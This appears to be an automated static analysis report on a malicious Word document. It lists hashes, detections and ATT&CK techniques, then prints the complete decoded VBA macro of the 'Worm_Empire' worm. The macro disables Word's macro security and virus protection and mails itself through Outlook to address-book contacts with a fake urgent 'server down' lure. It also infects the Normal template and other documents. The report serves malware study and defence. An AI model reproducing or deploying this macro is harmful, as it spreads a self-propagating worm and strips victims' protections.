Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6bfaa38be49fd96f…

MALICIOUS

Office (OLE)

31.0 KB Created: 2005-12-27 07:59:00 Authoring application: Microsoft Word 8.0 First seen: 2019-05-31
MD5: 2fd5f39d1458ba9319fe91c1d76b913f SHA-1: e27b9cf65ba18c88acd9fc6aa8212a4df5f82dd5 SHA-256: 6bfaa38be49fd96f73b00ef9456b9aaf237f3b606d04135235ffb88833561a6b
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample contains a VBA macro with a Document_Open subroutine, which is a common technique for executing malicious code upon opening a document. The script attempts to leverage Outlook to send copies of itself to contacts from the address book, using a subject line indicating urgency and a body suggesting an important announcement. This behavior strongly suggests a phishing or spamming campaign, likely to spread the malware further. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Win.Trojan.wmvg-1' further confirm its malicious nature.

Heuristics 4

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11339 bytes
SHA-256: be99edb2c5ef373d8ac896697e3d35030a0397957d679348b84d0de5a73e5585
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Worm_Empire"
Attribute VB_Base = "1Normal.Worm_Empire"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
    CommandBars("Macro").Controls("Security...").Enabled = False: System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
    CommandBars("Tools").Controls("Macro").Enabled = False: Options.ConfirmConversions = False: Options.SaveNormalPrompt = False: Options.VirusProtection = False
End If
Dim OLook, APIName, ABook, Off, Y As Integer, X As Integer, Z As Integer
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Security", "ActiveWorm") <> "Worm Empire" Then
    Set OLook = CreateObject("Outlook.Application"): Set APIName = OLook.GetNameSpace("MAPI")
    If OLook = "Outlook" Then
        APIName.Logon "profile", "password"
        For X = 1 To APIName.AddressLists.Count
            Set ABook = APIName.AddressLists(X): Set Off = OLook.CreateItem(0)
            For Y = 1 To ABook.AddressEntries.Count
                Off.Recipients.Add ABook.AddressEntries(Y): If Y > 50 Then Exit For
            Next Y
            Off.Subject = "Extremely URGENT: To All E-Mail User - " & Date
            Off.Body = "This announcement is for all E-MAIL user. Please take note that our E-Mail Server will down and we recommended you to read the document which attached with this E-Mail."
            Off.Attachments.Add ActiveDocument.FullName: Off.Send
        Next X
        APIName.Logoff
    End If
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Security", "ActiveWorm") = "Worm Empire"
End If
Dim AT, NT, AL As Long, NL As Long, CL As Long
Set AT = ActiveDocument.VBProject.VBComponents.Item(1): Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
AL = AT.CodeModule.CountOfLines: NL = NT.CodeModule.CountOfLines
If NT.Name <> "Worm_Empire" Then
    If NL > 0 Then NT.CodeModule.DeleteLines 1, NL
    NT.CodeModule.AddFromString "Private Sub Document_Close()"
    For CL = 2 To AL
        NT.CodeModule.InsertLines CL, AT.CodeModule.Lines(CL, 1)
    Next CL
    NT.Name = "Worm_Empire"
    If ActiveDocument.ReadOnly = False Then
        ActiveDocument.SaveAs ActiveDocument.FullName
    Else
        ActiveDocument.Saved = True
    End If
End If
If AT.Name <> "Worm_Empire" Then
    If AL > 0 Then AT.CodeModule.DeleteLines 1, AL
    AT.CodeModule.AddFromString "Private Sub Document_Open()"
    For CL = 2 To NL
        AT.CodeModule.InsertLines CL, NT.CodeModule.Lines(CL, 1)
    Next CL
    AT.Name = "Worm_Empire"
    If ActiveDocument.ReadOnly = False Then
        ActiveDocument.SaveAs ActiveDocument.FullName
    Else
        ActiveDocument.Saved = True
    End If
End If
If Day(Date) = 10 And Hour(Time) = 10 Then
    For CL = 1 To 5
        ActiveDocument.SaveAs Day(Date) & Month(Date) & Year(Date) & Second(Time) & CL
    Next CL
    With Selection
        .GoTo wdGoToLine, wdGoToAbsolute, 1
        .Font.Size = 40
        .Font.Underline = wdUnderlineWords
        .Font.Italic = True
        .TypeText "Worm! Let's We Enjoy." & Chr(10)
    End With
End If
End Sub

' Processing file: /opt/analyzer/scan_staging/89f142ac9095417d8cde237b43ea1e7f.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Worm_Empire - 5870 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x0000 ""
' 	Ne 
' 	IfBlock 
' Line #3:
' 	LitVarSpecial (False)
' 	LitStr 0x000B "Security..."
' 	LitStr 0x0005 "Macro"
' 	ArgsLd CommandBars 0x0
... (truncated)